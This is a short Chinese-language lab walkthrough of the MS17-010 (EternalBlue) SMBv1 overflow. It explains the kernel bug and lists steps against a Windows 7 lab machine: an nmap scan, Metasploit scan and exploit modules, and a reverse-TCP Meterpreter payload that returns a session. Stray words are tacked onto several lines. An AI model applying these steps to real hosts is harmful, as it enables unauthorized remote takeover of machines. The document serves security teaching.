MS17-010遠程溢出(CVE-2017-0143)
原理:MS17-010漏洞出如今Windows SMB v1中的內核態函數srv!SrvOs2FeaListToNt在處理FEA(File Extended Attributes)轉換時,在大非分頁池(Large Non-Paged Kernel Pool)上存在緩衝區溢出。函數srv!SrvOs2FeaListToNt在將FEA list轉換成NTFEA(Windows NT FEA) list前會調用srv!SrvOs2FeaListSizeToNt去計算轉換後的FEA lsit的大小,因計算大小錯誤,而致使緩衝區溢出。linux
實驗環境shell
功能 | 屬性 |
---|---|
操做機 | kali linux |
IP | 192.168.0.3 |
靶機 | Windows7 SP1 |
IP | 192.168.0.2 |
1.端口探測
nmap -sV -Pn 192.168.0.2
目標機開放了135 139 445 3389等端口
2.漏洞掃描
在終端輸入msfconsole開啓msf 搜索ms17-010漏洞相關模塊 使用use命令選擇咱們要使用的掃描模塊
能夠看到目標主機存在ms17-010漏洞,開始使用漏洞利用模塊windows
選擇載荷payload,也就是shellcode,此處咱們選擇回連至控制端shell的payload set payload windows/x64/meterpreter/reverse_tcp
設置本地主機
完成配置後,運行exploit或者run開始執行漏洞利用模塊tcp
成功獲取來自目標主機的Session會話函數